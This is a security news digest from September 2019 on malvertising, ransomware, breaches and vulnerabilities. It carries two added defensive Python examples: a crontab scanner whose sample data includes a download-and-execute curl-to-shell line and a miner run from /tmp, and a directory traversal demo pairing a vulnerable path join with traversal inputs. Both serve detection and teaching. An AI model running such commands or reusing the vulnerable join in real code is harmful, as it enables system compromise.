Silobreaker Daily Cyber Digest – 02 September 2019
New tactics observed in WordPress malvertising campaign
- New features include the addition of a script that attempts to install a backdoor into the site, as well as the targeting of additional vulnerable plugins. Currently targeted plugins include Bold Page Builder, Blog Designer, and all former NicDark plugins.
- The researchers previously observed a number of IP addresses linked to the campaign’s web hosting providers; however, only one remains active.
Source (Includes IOCs)
Finnish public service websites targeted in DoS attack
- A number of Finnish public service websites were targeted in a denial-of-service (DoS) attack that took place on August 21st, 2019. Targeted websites included those of the Finnish police force Poliisi, the central tax administration offices Vero, the Population Register Centre, the government’s online portal, the social insurance institution Kela, and the Finnish Border Guard’s website.
- The Finnish National Bureau of Investigations and the country’s National Cyber Security Centre are investigating the attacks, including a possible link between the attack and Russia’s President Putin’s recent visit to the country, which coincided with the attack.
Rise in defacement of Malaysian websites before Merdeka Day
- In an alert issued by the Malaysian Computer Emergency Response Team (MyCERT), the agency reported an increase in website defacements observed in the run up to the country’s independence day, Hari Merdeka, having observed a spike since August 28th, 2019.
- A similar notice was released by Malaysia’s National Cyber Security Agency, which also noted a number of Distributed Denial-of-Service attacks and malware infections targeting Malaysian organisations.
Ransomware attacks target 10 school systems across the US
- Researchers at Armor identified a spate of ransomware attacks directed against 10 school systems in Connecticut, New York State, California, Idaho, New Jersey and Washington State. Three of the schools have revealed that Ryuk Ransomware was used to encrypt their systems.
- Ransomware attacks were also recorded against Lake County, the Watertown Daily Times, and the Hospice of San Joaquin.
Sextortion scammers claim to be members of ChaosCC hacker group
- Bleeping Computer reported a sextortion email that purports to be sent by the hacker group Chaos Computer Club. The email states that the recipient’s computer is infected with a Trojan that recorded them on adult websites.
- The scammers, who have no access to the user’s device, claim that they will distribute a video recording of their target unless they are paid $700 in Bitcoin. Bleeping Computer reported that the wallet associated with the email contains approximately $2000 in BTC.
Recently disclosed iPhone campaign targeted Uyghur Muslims
- According to TechCrunch, Uyghur Muslims were targeted by recent iPhone watering hole attacks hidden in websites. The attacks, discovered by Google Project Zero, are said to have been state-backed, most likely by China.
- According to Forbes, the websites targeting Uyghur Muslims not only targeted iOS, but also Android and Microsoft Windows operating systems, suggesting the campaign is much broader than initially reported by Project Zero. It remains unclear which exploits were used for those operating systems.
Criminals advertise profitability of Sodinokibi on underground networks
- Security researcher Damian provided Bleeping Computer with screenshots that showed Sodinokibi malware advertisements on underground forums. In July 2019, a user operating under the alias ‘UNKN’ stated that they were looking to expand their activity and that a small number of seats were available for experienced individuals.
- The post stated that it was forbidden to operate Sodinokibi in the Commonwealth of Independent States (CIS) and refused to work with English-speaking affiliates. Screenshots also showed victims paying Bitcoin ransoms for as much as $240,000.
- Bleeping Computer tentatively suggested that there could be ties between Sodinokibi and GandCrab malware operators and affiliates. The report pointed to code-level similarities, the refusal to carry out business in the CIS area, and more. Despite these links, Bleeping Computer concluded that ‘there is no clear, undeniable evidence’ that both ransomware families are run by the same individuals.
United Rentals attributes malicious emails to third party advertising partner
- Customers of equipment rental company United Rentals received invoicing emails with links that led to malware believed to be a banking trojan. The campaign is notable as the emails sent users to a page on United Rentals’ website.
- United Rentals informed customers that the cause of the breach was an unauthorized user gaining access to the platform used by a third-party advertiser to conduct email campaigns.
- KrebsOnSecurity identified that the advertiser was Pardot, an email marketing division of Salesforce. Salesforce stated that the compromise was not in the Pardot platform but at a third-party marketing agency that uses Pardot.
XMR crypto mining campaign targets Intel machines running Linux
- Security researcher Larry Cashdollar identified coin mining malware on Intel systems running Linux. The malware is configured to target Intel x86 and 686 processors. It had previously only been discovered on Arm-powered IoT devices and appears to be a variant of other IoT crypto mining botnets.
- The malware looks to establish an SSH connection on port 22 and deliver itself as a gzip archive. It then creates three different directories which contain a variant of the XMRig miner in x86 32-bit or 64-bit format.
- The malware then installs the cryptocurrency miner itself and looks to achieve persistence by modifying the infected system’s crontab file. A shell script is also installed which allows communication with the attacker’s C2.
Source (Includes IOCs)
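Because the campaign above persists through the crontab, a defender’s first check is the scheduled entries themselves. The following scanner is an added example, not code from the digest or the researcher’s report: it parses user-crontab lines (no user field) and flags commands that reference a known miner binary or flag, run from a world-writable temporary directory, or pipe a download straight into a shell. The crontab lines, pool hostname and IP address are constructed for the example.

```python
import re

# Constructed sample crontab (user crontab format, no user field); not the campaign's IOCs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update -q
*/5 * * * * /tmp/.x86_64/xmrig -o pool.example.invalid:3333 --donate-level 1
@reboot /bin/sh /var/tmp/.sh/update.sh >/dev/null 2>&1
30 1 * * 0 /usr/local/bin/backup.sh
* * * * * curl -s http://198.51.100.7/p.sh | sh
"""

# Indicator groups: miner binaries/flags, execution from temp dirs, download-and-execute pipes.
MINER_PATTERNS = [r"\bxmrig\b", r"\bminerd\b", r"--donate-level", r"stratum\+tcp://"]
SUSPICIOUS_PATHS = [r"(^|\s)/tmp/", r"(^|\s)/var/tmp/", r"(^|\s)/dev/shm/"]
DOWNLOAD_EXEC = [r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"]

CHECKS = (("miner indicator", MINER_PATTERNS),
          ("runs from temp dir", SUSPICIOUS_PATHS),
          ("download-and-execute", DOWNLOAD_EXEC))


def scan_crontab(text: str) -> list:
    """Return a list of (line_no, line, reasons) for each suspicious crontab entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        # Split the schedule from the command: '@reboot'-style lines have one schedule
        # field, standard lines have five (minute hour dom month dow).
        if stripped.startswith("@"):
            fields = stripped.split(None, 1)
        else:
            fields = stripped.split(None, 5)
        command = fields[-1] if len(fields) >= 2 else stripped
        reasons = [label for label, patterns in CHECKS
                   if any(re.search(p, command) for p in patterns)]
        if reasons:
            findings.append((n, stripped, reasons))
    return findings


if __name__ == "__main__":
    for n, entry, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {n}: {', '.join(reasons)}: {entry}")
```

On a live host the same function can be fed the output of `crontab -l` for each user; a match is a lead to investigate, not proof of infection.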
Leaks and Breaches
Personal data of 1,400 Navicent Health patients potentially exposed
- The sensitive data may have been accessed by hackers following a phishing attack on an email account containing information on patients and individuals responsible for paying a patient’s bill. The phishing email was most likely opened between June 22nd and June 24th, 2019.
- Potentially exposed data includes first and last names, addresses, phone numbers, dates of birth, Social Security numbers, financial information, as well as medical information. The medical centre’s electronic medical record system was not accessed.
212,000 customer call recordings exposed in Teletext Holidays data breach
- Verdict researchers discovered an unsecured Amazon Web Services server belonging to Truly Travels Ltd, trading as Teletext Holidays, which contained 532,000 files and exposed private customer data. The files have since been removed.
- Of these files, 212,000 were audio recordings between Teletext customers and its India-based call centre that took place between April 10th and August 10th, 2016. The conversations included customer details such as flight times, locations, costs, partial card details, names, and dates of birth.
Taiwanese hospitals targeted in ransomware attacks
- According to the Taiwan Ministry of Health and Welfare, 56 hospitals were targeted by ransomware attacks that started on August 29th, 2019. A number of hospitals restored their systems within two hours and it is not believed any medical records were leaked. It is unclear where the attack originated.
Foxit data breach exposes the details of customers
- On August 30th, 2019, PDF software provider Foxit Software revealed that a third party gained unauthorized access to Foxit’s ‘My Account’ user data. Exposed details included email addresses, passwords, phone numbers, company names, and more. Foxit stated that financial information was not affected.
The Thailand Computer Security Coordination Center alerts gamblers of data leak
- The Thailand Computer Security Coordination Center (ThaiCERT) informed online gamblers that their confidential data had been leaked from gambling websites based overseas.
- ThaiCERT found the leak of 41 million items, 3.3 million of which belonged to Thais. Leaked information included names, government identification numbers, banking details, and more.
Critical vulnerability fixed in popular MuleSoft products
- Middleware company MuleSoft patched a directory traversal vulnerability in versions 3 and 4 of its Mule runtime engine and in its API Gateway. The flaw could allow an attacker to upload and plant files in unexpected locations on a system, including locations where a malicious file could be executed automatically.
- MuleSoft privately informed its customers and provided a patch on July 31st, 2019, before publicly disclosing the vulnerability.
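The MuleSoft flaw belongs to the directory traversal class, where a client-supplied file name is joined onto a server directory without checking that the result stays inside it. The snippet below is an added illustration of that class, not MuleSoft’s code or its fix: the vulnerable join is shown beside a hardened version that resolves the candidate path and rejects anything outside the upload root. The upload directory and file names are hypothetical.

```python
import os
from pathlib import Path

UPLOAD_ROOT = Path("/srv/app/uploads")  # hypothetical upload directory


def unsafe_upload_path(filename: str) -> str:
    """Vulnerable pattern: the client-supplied name is joined directly onto the root.
    '..' segments climb out of the directory, and an absolute name replaces it entirely."""
    return os.path.join(str(UPLOAD_ROOT), filename)


def normalised_unsafe_path(filename: str) -> str:
    """Where the unsafe join actually lands once the kernel collapses '..' segments."""
    return os.path.normpath(unsafe_upload_path(filename))


def safe_upload_path(relative_name: str) -> Path:
    """Hardened pattern: resolve the joined path and require it to be strictly
    below UPLOAD_ROOT. Subdirectories are still allowed; escapes are rejected."""
    if not relative_name or "\x00" in relative_name:
        raise ValueError("empty or NUL-containing file name")
    root = UPLOAD_ROOT.resolve(strict=False)
    # Path('/a') / '/etc/passwd' yields '/etc/passwd', so absolute names are caught
    # by the containment check below rather than silently replacing the root.
    candidate = (root / relative_name).resolve(strict=False)
    if candidate == root or root not in candidate.parents:
        raise ValueError(f"path escapes upload directory: {relative_name!r}")
    return candidate


def rejects(relative_name: str) -> bool:
    """True if the hardened resolver refuses the name (helper for checks)."""
    try:
        safe_upload_path(relative_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in ("reports/q3.pdf", "../../etc/cron.d/evil", "/etc/passwd", "."):
        print(f"{name!r}: unsafe -> {normalised_unsafe_path(name)}, "
              f"hardened -> {'rejected' if rejects(name) else safe_upload_path(name)}")
```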
Trend Micro report investigates Jenkins plugin vulnerabilities
- Trend Micro examined plugin vulnerabilities arising from credentials stored in plain text. Vulnerabilities such as CVE-2019-10348 in Gogs, CVE-2019-10350 in Port Allocator, and CVE-2019-10351 in Caliper CL can be exploited to gain access to sensitive user credentials.
- A list of affected products and vulnerabilities, as well as a full technical analysis of the associated issues, is available via Trend Micro.
DDoS attack targets online forum used by Hong Kong protestors
- On August 31st, 2019, a DDoS attack was launched against LIHKG. The forum has been used by citizens of Hong Kong to organize mass rallies. The DDoS attack lasted a few hours before service was restored.
Twitter CEO Jack Dorsey’s account hacked in SIM swap attack
- On August 30th, 2019, Jack Dorsey’s account was compromised and tweeted a series of offensive statements for a period of approximately 15 minutes. A group known as the Chuckling Squad claimed responsibility for the attack.
- Twitter stated that the account was compromised due to a security issue with an unnamed mobile operator. The BBC reported that a source at Twitter confirmed that the account was accessed through a SIM swapping attack. The attackers posted tweets via Twitter’s text message feature.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.